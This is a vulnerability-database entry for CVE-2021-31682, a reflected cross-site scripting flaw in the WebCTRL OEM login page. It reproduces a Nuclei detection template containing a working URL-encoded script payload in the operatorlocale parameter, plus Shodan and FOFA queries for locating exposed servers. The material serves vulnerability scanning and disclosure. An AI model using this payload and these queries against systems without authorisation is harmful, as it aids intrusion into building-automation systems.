Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-31682
HistoryOct 30, 2021 - 10:04 a.m.

WebCTRL OEM <= 6.5 - Cross-Site Scripting

2021-10-3010:04:42
ProjectDiscovery
github.com
6
cve-2021-31682
cross-site scripting
webctrl
packetstorm
automatedlogic

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.021

Percentile

89.2%

WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter.

id: CVE-2021-31682

info:
  name: WebCTRL OEM <= 6.5 - Cross-Site Scripting
  author: gy741,dhiyaneshDk
  severity: medium
  description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of WebCTRL OEM that addresses the XSS vulnerability (CVE-2021-31682).
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-31682
    - https://github.com/3ndG4me/WebCTRL-OperatorLocale-Parameter-Reflected-XSS
    - https://www.automatedlogic.com/en/products-services/webctrl-building-automation-system/
    - http://packetstormsecurity.com/files/164707/WebCTRL-OEM-6.5-Cross-Site-Scripting.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-31682
    cwe-id: CWE-79
    epss-score: 0.0116
    epss-percentile: 0.84847
    cpe: cpe:2.3:a:automatedlogic:webctrl:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: automatedlogic
    product: webctrl
    shodan-query:
      - html:"/_common/lvl5/dologin.jsp"
      - http.html:"/_common/lvl5/dologin.jsp"
    fofa-query: body="/_common/lvl5/dologin.jsp"
  tags: cve2021,cve,webctrl,xss,packetstorm,automatedlogic

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'
          - 'common/lvl5'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100de541093311a11b542ffb55fadd51a1ae533297011c9b779a1fda633748ed8c6022021e04972005fa23af21f046c557622c7542ff0c37f40ec7175b5c4b568946c87:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.021

Percentile

89.2%